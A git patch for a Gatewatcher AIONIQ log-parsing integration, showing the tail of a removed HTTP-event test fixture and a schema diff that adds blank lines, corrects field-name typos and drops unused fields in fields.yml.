GMT\",\"vary\":\"Accept-Encoding\",\"http_method\":\"HEAD\",\"status\":200},\"host\":\"gcap-sekoia.gatewatcher.com\",\"timestamp_detected\":\"2022-06-03T14:59:08.833Z\",\"ether\":{\"src_mac\":\"00:17:a4:77:09:20\",\"dest_mac\":\"a0:36:9f:0f:b1:70\"},\"src_port\":49804,\"flow_id\":1686930575880829,\"in_iface\":\"monvirt\",\"dest_ip\":\"1.2.3.4\",\"timestamp_analyzed\":\"2022-06-03T14:59:41.378Z\",\"metadata\":{\"flowbits\":[\"Office.UA\"]},\"gcap\":\"gcap-sekoia.gatewatcher.com\",\"tx_id\":4,\"uuid\":\"4f1bd378-9439-4c1c-ab1d-4b3ba6c22b87\"}",
-    "event": {
-      "category": [
-        "network"
-      ],
-      "kind": "event",
-      "type": [
-        "info"
-      ]
-    },
-    "@timestamp": "2022-06-03T14:59:41.378000Z",
-    "destination": {
-      "address": "1.2.3.4",
-      "ip": "1.2.3.4",
-      "port": 80
-    },
-    "gatewatcher": {
-      "event_type": "http",
-      "flow_id": "1686930575880829",
-      "gcap": "gcap-sekoia.gatewatcher.com",
-      "gcenter": [
-        "gcenter-sekoia.gatewatcher.com",
-        "gcenter-sekoia.gatewatcher.com"
-      ],
-      "timestamp_analyzed": "2022-06-03T14:59:41.378Z",
-      "timestamp_detected": "2022-06-03T14:59:08.833Z",
-      "type": "suricata"
-    },
-    "http": {
-      "request": {
-        "method": "HEAD"
-      },
-      "response": {
-        "status_code": 200
-      }
-    },
-    "network": {
-      "transport": "TCP"
-    },
-    "observer": {
-      "hostname": "gcap-sekoia.gatewatcher.com",
-      "mac": [
-        "00:17:a4:77:09:20",
-        "a0:36:9f:0f:b1:70"
-      ],
-      "name": "gcap-sekoia.gatewatcher.com",
-      "type": "firewall",
-      "version": "0.2"
-    },
-    "related": {
-      "hosts": [
-        "gcap-sekoia.gatewatcher.com",
-        "www.xmlformats.com"
-      ],
-      "ip": [
-        "1.2.3.4",
-        "9.8.7.6"
-      ]
-    },
-    "source": {
-      "address": "9.8.7.6",
-      "ip": "9.8.7.6",
-      "port": 49804
-    },
-    "url": {
-      "domain": "www.xmlformats.com",
-      "path": "/exploit.html",
-      "registered_domain": "xmlformats.com",
-      "subdomain": "www",
-      "top_level_domain": "com"
-    },
-    "user_agent": {
-      "device": {
-        "name": "Other"
-      },
-      "name": "Other",
-      "original": "Microsoft Office Existence Discovery",
-      "os": {
-        "name": "Other"
-      }
-    }
-  }
-}
\ No newline at end of file

From 29f3a8b92b607941604b336e4b6e1fdec3411a7d Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Mon, 16 Sep 2024 11:32:22 +0200
Subject: [PATCH 026/317] adding test files and cleaning of unsused fields

---
 GateWatcher/aioniq_ecs/_meta/fields.yml       | 373 +++++++++++++-----
 .../aioniq_ecs/tests/beacon_event.json        |  92 +++++
 .../tests/codebreaker_powershell_alert.json   |  85 ++++
 .../tests/codebreaker_shellcode_alert.json    |  92 +++++
 GateWatcher/aioniq_ecs/tests/dga_event.json   |  90 +++++
 GateWatcher/aioniq_ecs/tests/history.json     |  52 +++
 GateWatcher/aioniq_ecs/tests/ioc.json         |  96 +++++
 .../aioniq_ecs/tests/malcore_event.json       | 154 ++++++++
 GateWatcher/aioniq_ecs/tests/metadata.json    | 113 ++++++
 .../aioniq_ecs/tests/metadata_fileinfo.json   | 117 ++++++
 GateWatcher/aioniq_ecs/tests/nba.json         | 139 +++++++
 GateWatcher/aioniq_ecs/tests/ransomware.json  |  87 ++++
 GateWatcher/aioniq_ecs/tests/retrohunt.json   |  49 +++
 .../aioniq_ecs/tests/sigflow_alert.json       | 127 ++++++
 .../aioniq_ecs/tests/sigflow_stats.json       |  48 +++
 15 files changed, 1611 insertions(+), 103 deletions(-)
 create mode 100644 GateWatcher/aioniq_ecs/tests/beacon_event.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/codebreaker_powershell_alert.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/codebreaker_shellcode_alert.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/dga_event.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/history.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/ioc.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/malcore_event.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/metadata.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/nba.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/ransomware.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/retrohunt.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/sigflow_alert.json
 create mode 100644 GateWatcher/aioniq_ecs/tests/sigflow_stats.json

diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index e6f4b0b85..733dd5550 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -1,1131 +1,1298 @@
+ecs.version:
+  description: version of ECS used (mandatory field)
+  name: ecs.version
+  type: text
+
 gatewatcher.beacon.active:
   description: beacon active field
   name: gatewatcher.beacon.active
   type: text
+
 gatewatcher.beacon.hostname_resolution:
   description: beacon hostname_resolution field
   name: gatewatcher.beacon.hostname_resolution
   type: text
+
 gatewatcher.beacon.id:
   description: beacon id field
   name: gatewatcher.beacon.id
   type: text
+
 gatewatcher.beacon.mean_time_interval:
   description: beacon mean_time_interval
   name: gatewatcher.beacon.mean_time_interval
   type: text
+
 gatewatcher.beacon.possible_cnc:
   description: beaocn possible_cnc field
   name: gatewatcher.beacon.possible_cnc
   type: text
+
 gatewatcher.beacon.session_count:
   description: beacon session_count field
   name: gatewatcher.beacon.session_count
   type: text
+
 gatewatcher.beacon.type:
   description: beacon type field
   name: gatewatcher.beacon.type
   type: text
-gatewatcher.dcerpc:
-  description: dcerpc metadata field
-  name: gatewatcher.dcerpc
-  type: text
+
 gatewatcher.dcerpc.call_id:
   description: dcerpc call_id field
   name: gatewatcher.dcerpc.call_id
   type: number
+
 gatewatcher.dcerpc.interfaces:
   description: dcerpc interfaces field
   name: gatewatcher.dcerpc.interfaces
   type: text
+
 gatewatcher.dcerpc.req:
   description: dcerpc req field
   name: gatewatcher.dcerpc.req
   type: text
+
 gatewatcher.dcerpc.request:
   description: dcerpc request field
   name: gatewatcher.dcerpc.request
   type: text
+
 gatewatcher.dcerpc.res:
   description: dcerpc res field
   name: gatewatcher.dcerpc.res
   type: text
+
 gatewatcher.dcerpc.response:
   description: dcerpc response field
   name: gatewatcher.dcerpc.response
   type: text
+
 gatewatcher.dcerpc.rpc_version:
   description: dcerpc rpc_version field
   name: gatewatcher.dcerpc.rpc_version
   type: text
+
 gatewatcher.dga.dga_count:
   description: dga dga_count field
   name: gatewatcher.dga.dga_count
   type: text
+
 gatewatcher.dga.dga_ratio:
   description: dga dga_ratio field
   name: gatewatcher.dga.dga_ratio
   type: text
+
 gatewatcher.dga.malware_behavior_confidence:
   description: dga malware_behavior_confidence field
   name: gatewatcher.dga.malware_behavior_confidence
   type: text
+
 gatewatcher.dga.nx_domain_count:
   description: dga nx_domain_count field
   name: gatewatcher.dga.nx_domain_count
   type: text
+
 gatewatcher.dga.top_DGA:
   description: dga top_DGA field
   name: gatewatcher.dga.top_DGA
   type: text
-gatewatcher.dhcp:
-  description: dhcp metadata field
-  name: gatewatcher.dhcp
-  type: text
+
 gatewatcher.dhcp.assigned_ip:
   description: dhcp assigned_ip field
   name: gatewatcher.dhcp.assigned_ip
   type: ip
+
 gatewatcher.dhcp.client_ip:
   description: dhcp client_ip field
   name: gatewatcher.dhcp.client_ip
   type: ip
+
 gatewatcher.dhcp.client_mac:
   description: dhcp client_mac field
   name: gatewatcher.dhcp.client_mac
   type: text
+
 gatewatcher.dhcp.dhcp_type:
   description: dhcp dhcp_type field
   name: gatewatcher.dhcp.dhcp_type
   type: text
+
 gatewatcher.dhcp.dns_servers:
   description: dhcp dns_servers field
   name: gatewatcher.dhcp.dns_servers
   type: text
+
 gatewatcher.dhcp.hostname:
   description: dhcp hostname field
   name: gatewatcher.dhcp.hostname
   type: text
+
 gatewatcher.dhcp.id:
   description: dhcp id field
   name: gatewatcher.dhcp.id
   type: number
+
 gatewatcher.dhcp.lease_time:
   description: dhcp lease_time field
   name: gatewatcher.dhcp.lease_time
   type: number
-gatewatcher.dhcp.lease_type:
-  description: dhcp lease_type field
-  name: gatewatcher.dhcp.lease_type
-  type: number
+
 gatewatcher.dhcp.next_server_ip:
   description: dhcp next_server_ip field
   name: gatewatcher.dhcp.next_server_ip
   type: ip
+
 gatewatcher.dhcp.relay_ip:
   description: dhcp relay_ip field
   name: gatewatcher.dhcp.relay_ip
   type: ip
+
 gatewatcher.dhcp.routers:
   description: dhcp routers field
   name: gatewatcher.dhcp.routers
   type: text
+
 gatewatcher.dhcp.subnet_mask:
   description: dhcp subnet_mask field
   name: gatewatcher.dhcp.subnet_mask
   type: ip
+
 gatewatcher.dhcp.type:
   description: dhcp type field
   name: gatewatcher.dhcp.type
   type: text
+
 gatewatcher.dnp3.application:
   description: dnp3 application field
   name: gatewatcher.dnp3.application
   type: text
+
 gatewatcher.dnp3.control:
   description: dnp3 control field
   name: gatewatcher.dnp3.control
   type: text
+
 gatewatcher.dnp3.dst:
   description: dnp3 dst field
   name: gatewatcher.dnp3.dst
   type: number
+
 gatewatcher.dnp3.iin:
   description: dnp3 iin field
   name: gatewatcher.dnp3.iin
   type: text
+
 gatewatcher.dnp3.src:
   description: dnp3 src field
   name: gatewatcher.dnp3.src
   type: text
+
 gatewatcher.dnp3.type:
   description: dnp3 type field
   name: gatewatcher.dnp3.type
   type: text
+
 gatewatcher.dns:
   description: dns metadata field
   name: gatewatcher.dns
   type: text
+
 gatewatcher.email.body_md5:
   description: smtp email subject_md5 field
   name: gatewatcher.email.body_md5
   type: text
+
 gatewatcher.email.from:
   description: email from field
   name: gatewatcher.email.from
   type: text
+
 gatewatcher.email.status:
   description: email status field
   name: gatewatcher.email.status
   type: text
+
 gatewatcher.email.subject_md5:
   description: smtp subject_md5 field
   name: gatewatcher.email.subject_md5
   type: text
+
 gatewatcher.email.to:
   description: email to field
   name: gatewatcher.email.to
   type: text
+
 gatewatcher.event.created:
   description: Event created field
   name: gatewatcher.event.created
   type: datetime
+
 gatewatcher.event.id:
   description: Event id field
   name: gatewatcher.event.id
   type: text
-gatewatcher.event_type:
-  description: Type of event
-  name: gatewatcher.event_type
-  type: keyword
+
 gatewatcher.file.file_id:
   description: file file_id field
   name: gatewatcher.file.file_id
   type: number
+
 gatewatcher.file.gaps:
   description: file gaps field
   name: gatewatcher.file.gaps
   type: boolean
-gatewatcher.file.hash.md5:
-  description: File MD5 hash field
-  name: gatewatcher.file.hash.md5
-  type: text
-gatewatcher.file.hash.sha256:
-  description: File SHA256 hash field
-  name: gatewatcher.file.hash.sha256
-  type: text
+
 gatewatcher.file.magic:
   description: File magic field
   name: gatewatcher.file.magic
   type: text
+
 gatewatcher.file.sid:
   description: file sid array field
   name: gatewatcher.file.sid
   type: text
+
 gatewatcher.file.state:
   description: File state field
   name: gatewatcher.file.state
   type: text
+
 gatewatcher.file.stored:
   description: File stored field
   name: gatewatcher.file.stored
   type: boolean
+
 gatewatcher.file.tx_id:
   description: file tx_id field
   name: gatewatcher.file.tx_id
   type: number
+
 gatewatcher.files:
   description: files field
   name: gatewatcher.files
   type: text
+
 gatewatcher.flow.bytes_toclient:
   description: flow bytes_toclient field
   name: gatewatcher.flow.bytes_toclient
   type: number
+
 gatewatcher.flow.bytes_toserver:
   description: flow bytes_toserver field
   name: gatewatcher.flow.bytes_toserver
   type: number
+
 gatewatcher.flow.pkts_toclient:
   description: flow pkts_toclient field
   name: gatewatcher.flow.pkts_toclient
   type: number
+
 gatewatcher.flow.pkts_toserver:
   description: flow pkts_toserver field
   name: gatewatcher.flow.pkts_toserver
   type: number
+
 gatewatcher.flow.start:
   description: flow start field
   name: gatewatcher.flow.start
   type: datetime
-gatewatcher.ftp:
-  description: ftp metadata field
-  name: gatewatcher.ftp
-  type: text
-gatewatcher.ftp.command:
-  description: ftp command field
-  name: gatewatcher.ftp.command
-  type: text
-gatewatcher.ftp.command_truncated:
-  description: ftp command_truncated field
-  name: gatewatcher.ftp.command_truncated
-  type: boolean
+
 gatewatcher.ftp.completion_code:
   description: ftp completion_code field
   name: gatewatcher.ftp.completion_code
   type: text
+
 gatewatcher.ftp.reply:
   description: ftp reply field
   name: gatewatcher.ftp.reply
   type: text
+
 gatewatcher.ftp.reply_received:
   description: ftp reply_received field
   name: gatewatcher.ftp.reply_received
   type: text
+
 gatewatcher.ftp.reply_truncated:
   description: ftp reply_truncated field
   name: gatewatcher.ftp.reply_truncated
   type: boolean
+
 gatewatcher.ftp_data.command:
   description: ftp_data command field
   name: gatewatcher.ftp_data.command
   type: text
+
 gatewatcher.ftp_data.filename:
   description: ftp_data filename field
   name: gatewatcher.ftp_data.filename
   type: text
-gatewatcher.gcap:
-  description: Name of the gcap
-  name: gatewatcher.gcap
-  type: keyword
-gatewatcher.gcenter:
-  description: Name of the associated gcenter
-  name: gatewatcher.gcenter
-  type: keyword
+
 gatewatcher.history.code:
   description: history code field
   name: gatewatcher.history.code
   type: number
+
 gatewatcher.history.content:
   description: history content field
   name: gatewatcher.history.content
   type: text
+
 gatewatcher.history.endpoint:
   description: history endpoint field
   name: gatewatcher.history.endpoint
   type: text
+
 gatewatcher.history.id:
   description: history id field
   name: gatewatcher.history.id
   type: number
+
 gatewatcher.history.ip:
   description: history ip field
   name: gatewatcher.history.ip
   type: ip
+
 gatewatcher.history.method:
   description: history method field
   name: gatewatcher.history.method
   type: text
+
 gatewatcher.history.name:
   description: history name field
   name: gatewatcher.history.name
   type: text
+
 gatewatcher.history.type:
   description: history type field
   name: gatewatcher.history.type
   type: text
-gatewatcher.http:
-  description: http metadata field
-  name: gatewatcher.http
-  type: text
+
 gatewatcher.http.accept:
   description: 'http accept metadata field '
   name: gatewatcher.http.accept
   type: text
+
 gatewatcher.http.accept_language:
   description: http accept language field
   name: gatewatcher.http.accept_language
   type: text
+
 gatewatcher.http.hostname:
   description: http hostname field metadata
   name: gatewatcher.http.hostname
   type: text
+
 gatewatcher.http.http2:
   description: http http2 field
   name: gatewatcher.http.http2
   type: text
+
 gatewatcher.http.http_refer:
   description: http_refer field
   name: gatewatcher.http.http_refer
   type: text
+
 gatewatcher.ikev2.errors:
   description: ikev2 errors field
   name: gatewatcher.ikev2.errors
   type: number
+
 gatewatcher.ikev2.exchange_type:
   description: ikev2 exchange_type field
   name: gatewatcher.ikev2.exchange_type
   type: number
+
 gatewatcher.ikev2.init_spi:
   description: ikev2 init_spi field
   name: gatewatcher.ikev2.init_spi
   type: text
+
 gatewatcher.ikev2.message_id:
   description: ikev2 message_id field
   name: gatewatcher.ikev2.message_id
   type: number
+
 gatewatcher.ikev2.notify:
   description: ikev2 notify field
   name: gatewatcher.ikev2.notify
   type: text
+
 gatewatcher.ikev2.payload:
   description: ikev2 payload field
   name: gatewatcher.ikev2.payload
   type: text
+
 gatewatcher.ikev2.resp_spi:
   description: ikev2 resp_spi field
   name: gatewatcher.ikev2.resp_spi
   type: text
+
 gatewatcher.ikev2.role:
   description: ikev2 role field
   name: gatewatcher.ikev2.role
   type: text
+
 gatewatcher.ikev2.version_major:
   description: ikev2 version_major field
   name: gatewatcher.ikev2.version_major
   type: number
+
 gatewatcher.ikev2.version_minor:
   description: ikev2 version_minor field
   name: gatewatcher.ikev2.version_minor
   type: number
-gatewatcher.ioc.campaings:
+
+gatewatcher.ioc.campaigns:
   description: ioc campaigns field
-  name: gatewatcher.ioc.campaings
+  name: gatewatcher.ioc.campaigns
   type: text
+
 gatewatcher.ioc.case_id:
   description: ioc case_id field
   name: gatewatcher.ioc.case_id
   type: text
+
 gatewatcher.ioc.categories:
   description: ioc categories field
   name: gatewatcher.ioc.categories
   type: text
+
 gatewatcher.ioc.creation_date:
   description: ioc creation_date field
   name: gatewatcher.ioc.creation_date
   type: datetime
+
 gatewatcher.ioc.description:
   description: ioc description field
   name: gatewatcher.ioc.description
   type: text
-gatewatcher.ioc.extrernal_links:
+
+gatewatcher.ioc.external_links:
   description: ioc external_links field
-  name: gatewatcher.ioc.extrernal_links
+  name: gatewatcher.ioc.external_links
   type: text
+
 gatewatcher.ioc.families:
   description: ioc families field
   name: gatewatcher.ioc.families
   type: text
+
 gatewatcher.ioc.kill_chain_phases:
   description: ioc kill_chain_phases field
   name: gatewatcher.ioc.kill_chain_phases
   type: text
+
 gatewatcher.ioc.meta_data.cwe:
   description: ioc meta_data cwe field
   name: gatewatcher.ioc.meta_data.cwe
   type: text
+
 gatewatcher.ioc.meta_data.descriptions:
   description: ioc meta_data descriptions field
   name: gatewatcher.ioc.meta_data.descriptions
   type: text
+
 gatewatcher.ioc.meta_data.usageMode:
   description: ioc meta_data usageMode field
   name: gatewatcher.ioc.meta_data.usageMode
   type: text
+
 gatewatcher.ioc.package_date:
   description: ioc package_date field
   name: gatewatcher.ioc.package_date
   type: datetime
+
 gatewatcher.ioc.relations:
   description: ioc relations field
   name: gatewatcher.ioc.relations
   type: text
+
 gatewatcher.ioc.signature:
   description: ioc signature field
   name: gatewatcher.ioc.signature
   type: text
+
 gatewatcher.ioc.tags:
   description: ioc tags field
   name: gatewatcher.ioc.tags
   type: text
+
 gatewatcher.ioc.targeted_countries:
   description: ioc targeted_countires field
   name: gatewatcher.ioc.targeted_countries
   type: text
+
 gatewatcher.ioc.targeted_organizations:
   description: ioc targeted_organizations field
   name: gatewatcher.ioc.targeted_organizations
   type: text
+
 gatewatcher.ioc.targeted_platforms:
   description: ioc targeted_platforms field
   name: gatewatcher.ioc.targeted_platforms
   type: text
+
 gatewatcher.ioc.targeted_sectors:
   description: ioc targeted_sectors field
   name: gatewatcher.ioc.targeted_sectors
   type: text
+
 gatewatcher.ioc.threat_actor:
   description: ioc threat_actor field
   name: gatewatcher.ioc.threat_actor
   type: text
+
 gatewatcher.ioc.tlp:
   description: ioc tlp field
   name: gatewatcher.ioc.tlp
   type: text
-gatewatcher.ioc.ttp:
-  description: ioc ttp field
-  name: gatewatcher.ioc.ttp
-  type: text
+
 gatewatcher.ioc.type:
   description: ioc type field
   name: gatewatcher.ioc.type
   type: text
+
 gatewatcher.ioc.updated_date:
   description: ioc updated_date field
   name: gatewatcher.ioc.updated_date
   type: datetime
+
 gatewatcher.ioc.usage_mode:
   description: ioc usage_mode field
   name: gatewatcher.ioc.usage_mode
   type: text
+
 gatewatcher.ioc.value:
   description: ioc value field
   name: gatewatcher.ioc.value
   type: text
+
 gatewatcher.krb5.cname:
   description: krb5 cname field
   name: gatewatcher.krb5.cname
   type: text
+
 gatewatcher.krb5.encryption:
   description: krb5 encryption field
   name: gatewatcher.krb5.encryption
   type: text
+
 gatewatcher.krb5.error_code:
   description: krb5 error_code field
   name: gatewatcher.krb5.error_code
   type: text
+
 gatewatcher.krb5.failed_request:
   description: krb5 failed_request field
   name: gatewatcher.krb5.failed_request
   type: text
+
 gatewatcher.krb5.msg_type:
   description: krb5 msg_type field
   name: gatewatcher.krb5.msg_type
   type: text
+
 gatewatcher.krb5.realm:
   description: krb5 realm field
   name: gatewatcher.krb5.realm
   type: text
+
 gatewatcher.krb5.sname:
   description: krb5 sname field
   name: gatewatcher.krb5.sname
   type: text
+
 gatewatcher.krb5.weak_encryption:
   description: krb5 weak_encryption field
   name: gatewatcher.krb5.weak_encryption
   type: boolean
+
 gatewatcher.malcore.analyzed_clean:
   description: malcore analyzed_clean field
   name: gatewatcher.malcore.analyzed_clean
   type: number
+
 gatewatcher.malcore.analyzed_error:
   description: malcore analyzed_error field
   name: gatewatcher.malcore.analyzed_error
   type: number
+
 gatewatcher.malcore.analyzed_infected:
   description: malcore analyzed_infected field
   name: gatewatcher.malcore.analyzed_infected
   type: number
+
 gatewatcher.malcore.analyzed_other:
   description: malcore analyzed_other field
   name: gatewatcher.malcore.analyzed_other
   type: number
+
 gatewatcher.malcore.analyzed_suspicious:
   description: malcore analyzed_suspicious field
   name: gatewatcher.malcore.analyzed_suspicious
   type: number
+
 gatewatcher.malcore.analyzers_up:
   description: malcore analyzers_up field
   name: gatewatcher.malcore.analyzers_up
   type: number
+
 gatewatcher.malcore.code:
   description: malcore code field
   name: gatewatcher.malcore.code
   type: number
+
 gatewatcher.malcore.detail_scan_time:
   description: malcore detail_scan_time field
   name: gatewatcher.malcore.detail_scan_time
   type: number
+
 gatewatcher.malcore.detail_threat_found:
   description: malcore detail_threat_found field
   name: gatewatcher.malcore.detail_threat_found
   type: text
+
 gatewatcher.malcore.detail_wait_time:
   description: malcore detail_wait_time field
   name: gatewatcher.malcore.detail_wait_time
   type: number
+
 gatewatcher.malcore.engine_id:
   description: malcore engine_id field
   name: gatewatcher.malcore.engine_id
   type: text
+
 gatewatcher.malcore.engines_last_update_date:
   description: malcore engines_last_update_date field
   name: gatewatcher.malcore.engines_last_update_date
   type: datetime
-gatewatcher.malcore.file:
-  description: Identifier of the file
-  name: gatewatcher.malcore.file
-  type: keyword
+
 gatewatcher.malcore.file_type:
   description: malcore file_type field
   name: gatewatcher.malcore.file_type
   type: text
+
 gatewatcher.malcore.file_type_description:
   description: malcore file_type_description field
   name: gatewatcher.malcore.file_type_description
   type: text
-gatewatcher.malcore.magic:
-  description: The magic number of the executable of the malware
-  name: gatewatcher.malcore.magic
-  type: keyword
+
 gatewatcher.malcore.magic_details:
   description: malcore magic_details field
   name: gatewatcher.malcore.magic_details
   type: text
+
 gatewatcher.malcore.processing_time:
   description: malcore processing_time field
   name: gatewatcher.malcore.processing_time
   type: number
-gatewatcher.malcore.replica:
-  description: Analysis is a replica of another previous one
-  name: gatewatcher.malcore.replica
-  type: keyword
+
 gatewatcher.malcore.reporting_token:
   description: malcore reporting_token field
   name: gatewatcher.malcore.reporting_token
   type: text
+
 gatewatcher.malcore.state:
   description: malcore state field
   name: gatewatcher.malcore.state
   type: text
+
 gatewatcher.malcore.total_found:
   description: malcore total_found field
   name: gatewatcher.malcore.total_found
   type: text
+
 gatewatcher.malicious_powershell.id:
   description: malicious_powershell id field
   name: gatewatcher.malicious_powershell.id
   type: text
+
 gatewatcher.malicious_powershell.proba_obfuscated:
   description: malicious_powershell proba_obfuscated field
   name: gatewatcher.malicious_powershell.proba_obfuscated
   type: number
+
 gatewatcher.malicious_powershell.sample_id:
   description: malicious_powershell sample_id field
   name: gatewatcher.malicious_powershell.sample_id
   type: text
+
 gatewatcher.malicious_powershell.score:
   description: malicious_powershell score field
   name: gatewatcher.malicious_powershell.score
   type: number
+
 gatewatcher.malicious_powershell.score_details:
   description: malicious_powershell score_details field
   name: gatewatcher.malicious_powershell.score_details
   type: text
+
 gatewatcher.matched_event.file.gaps:
   description: matched_event file gaps field
   name: gatewatcher.matched_event.file.gaps
   type: text
+
 gatewatcher.matched_event.file.hash.md5:
   description: matched_event file hash md5 field
   name: gatewatcher.matched_event.file.hash.md5
   type: text
+
 gatewatcher.matched_event.file.hash.sha256:
   description: matched_event file hash sha256 field
   name: gatewatcher.matched_event.file.hash.sha256
   type: text
+
 gatewatcher.matched_event.file.magic:
   description: matched_event file magic field
   name: gatewatcher.matched_event.file.magic
   type: text
+
 gatewatcher.matched_event.file.name:
   description: matched_event file name field
   name: gatewatcher.matched_event.file.name
   type: text
+
 gatewatcher.matched_event.file.sid:
   description: matched_event file sid field
   name: gatewatcher.matched_event.file.sid
   type: text
+
 gatewatcher.matched_event.file.size:
   description: matched_event file size field
   name: gatewatcher.matched_event.file.size
   type: text
+
 gatewatcher.matched_event.file.state:
   description: matched_event file state field
   name: gatewatcher.matched_event.file.state
   type: text
+
 gatewatcher.matched_event.file.stored:
   description: matched_event file stored field
   name: gatewatcher.matched_event.file.stored
   type: text
+
 gatewatcher.matched_event.file.tx_id:
   description: matched_event file tx_id field
   name: gatewatcher.matched_event.file.tx_id
   type: text
+
 gatewatcher.matched_event.id:
   description: matched_event id field
   name: gatewatcher.matched_event.id
   type: text
+
 gatewatcher.metadata.flowbits:
   description: metadata flowbits field
   name: gatewatcher.metadata.flowbits
   type: text
+
 gatewatcher.mqtt.connack:
   description: mqtt connack field
   name: gatewatcher.mqtt.connack
   type: text
-gatewatcher.nb_rescans:
-  description: Number of retroact analysis
-  name: gatewatcher.nb_rescans
-  type: long
+
 gatewatcher.nba.action:
   description: nba action field
   name: gatewatcher.nba.action
   type: text
+
 gatewatcher.nba.category:
   description: nba category field
   name: gatewatcher.nba.category
   type: text
+
 gatewatcher.nba.gid:
   description: nba gid field
   name: gatewatcher.nba.gid
   type: text
+
 gatewatcher.nba.metadata.performance_impact:
   description: nba metadata performance_impact field
   name: gatewatcher.nba.metadata.performance_impact
   type: text
+
 gatewatcher.nba.metadata.signature_severity:
   description: nba metadata signature_severity field
   name: gatewatcher.nba.metadata.signature_severity
   type: text
+
 gatewatcher.nba.packet:
   description: nba packet field
   name: gatewatcher.nba.packet
   type: text
+
 gatewatcher.nba.payload:
   description: nba payload field
   name: gatewatcher.nba.payload
   type: text
+
 gatewatcher.nba.payload_printable:
   description: nba payload_printable field
   name: gatewatcher.nba.payload_printable
   type: text
+
 gatewatcher.nba.rev:
   description: nba rev field
   name: gatewatcher.nba.rev
   type: text
+
 gatewatcher.nba.signature:
   description: nba signature field
   name: gatewatcher.nba.signature
   type: text
+
 gatewatcher.nba.signature_id:
   description: nba signature_id field
   name: gatewatcher.nba.signature_id
   type: text
+
 gatewatcher.nba.stream:
   description: nba stream field
   name: gatewatcher.nba.stream
   type: text
+
 gatewatcher.network.flow_id:
   description: Gatewatcher specific flow_id for network part
   name: gatewatcher.network.flow_id
   type: number
+
 gatewatcher.network.timestamp:
   description: Network timestamp field
   name: gatewatcher.network.timestamp
   type: datetime
+
 gatewatcher.network.tx_id:
   description: tx_id network field
   name: gatewatcher.network.tx_id
   type: number
+
 gatewatcher.nfs.file_tx:
   description: nfs file_tx field
   name: gatewatcher.nfs.file_tx
   type: boolean
+
 gatewatcher.nfs.filename:
   description: nfs filename field
   name: gatewatcher.nfs.filename
   type: text
+
 gatewatcher.nfs.hhash:
   description: nfs hhash field
   name: gatewatcher.nfs.hhash
   type: text
+
 gatewatcher.nfs.id:
   description: nfs id field
   name: gatewatcher.nfs.id
   type: number
+
 gatewatcher.nfs.procedure:
   description: nfs procedure field
   name: gatewatcher.nfs.procedure
   type: text
+
 gatewatcher.nfs.status:
   description: nfs status field
   name: gatewatcher.nfs.status
   type: text
+
 gatewatcher.nfs.type:
   description: nfs type field
   name: gatewatcher.nfs.type
   type: text
+
 gatewatcher.nfs.version:
   description: nfs version field
   name: gatewatcher.nfs.version
   type: number
+
 gatewatcher.notification.component:
   description: notification component field
   name: gatewatcher.notification.component
   type: text
+
 gatewatcher.notification.description:
   description: notification description field
   name: gatewatcher.notification.description
   type: text
+
 gatewatcher.notification.details:
   description: notification details field
   name: gatewatcher.notification.details
   type: text
+
 gatewatcher.notification.external_redirection:
   description: notification external_redirection field
   name: gatewatcher.notification.external_redirection
   type: text
+
 gatewatcher.notification.internal_redirection:
   description: notification internal_redirection field
   name: gatewatcher.notification.internal_redirection
   type: text
+
 gatewatcher.notification.resolution:
   description: notification resolution field
   name: gatewatcher.notification.resolution
   type: text
+
 gatewatcher.notification.risk:
   description: notification risk field
   name: gatewatcher.notification.risk
   type: number
+
 gatewatcher.notification.title:
   description: notification title field
   name: gatewatcher.notification.title
   type: text
+
 gatewatcher.observer.gcap.hostname:
   description: GCap hostname field
   name: gatewatcher.observer.gcap.hostname
   type: text
+
 gatewatcher.observer.gcap.ingress.interface.name:
   description: Gatewatcher ingress interface name
   name: gatewatcher.observer.gcap.ingress.interface.name
   type: text
+
 gatewatcher.observer.gcap.version:
   description: GCap version observer field
   name: gatewatcher.observer.gcap.version
   type: text
+
 gatewatcher.observer.log_format_version:
   description: Observer log format version field
   name: gatewatcher.observer.log_format_version
   type: text
+
 gatewatcher.observer.uuid:
   description: Observer UUID field
   name: gatewatcher.observer.uuid
   type: text
+
 gatewatcher.ransomware.alert_threshold:
   description: ransomware alert_threshold field
   name: gatewatcher.ransomware.alert_threshold
   type: text
+
 gatewatcher.ransomware.malicious_behavior_confidence:
   description: ransomware malicious_behavior_confidence field
   name: gatewatcher.ransomware.malicious_behavior_confidence
   type: text
+
 gatewatcher.ransomware.session_score:
   description: ransomware session_score field
   name: gatewatcher.ransomware.session_score
   type: text
+
 gatewatcher.rdp.channels:
   description: rdp channels field
   name: gatewatcher.rdp.channels
   type: text
+
 gatewatcher.rdp.client:
   description: rdp client field
   name: gatewatcher.rdp.client
   type: text
+
 gatewatcher.rdp.cookie:
   description: rdp cookie field
   name: gatewatcher.rdp.cookie
   type: text
+
 gatewatcher.rdp.event_type:
   description: rdp event_type field
   name: gatewatcher.rdp.event_type
   type: text
+
 gatewatcher.rdp.protocol:
   description: rdp protocol field
   name: gatewatcher.rdp.protocol
   type: text
+
 gatewatcher.rdp.server_supports:
   description: rdp server_supports field
   name: gatewatcher.rdp.server_supports
   type: text
+
 gatewatcher.rdp.tx_id:
   description: rdp tx_id field
   name: gatewatcher.rdp.tx_id
   type: number
-gatewatcher.reporting_token:
-  description: Token used by Gbox
-  name: gatewatcher.reporting_token
-  type: keyword
-gatewatcher.retroact:
-  description: Analysis result per retroact
-  name: gatewatcher.retroact
-  type: keyword
+
 gatewatcher.rfb.authentication:
   description: rfb authentication field
   name: gatewatcher.rfb.authentication
   type: text
+
 gatewatcher.rfb.client_protocol_version:
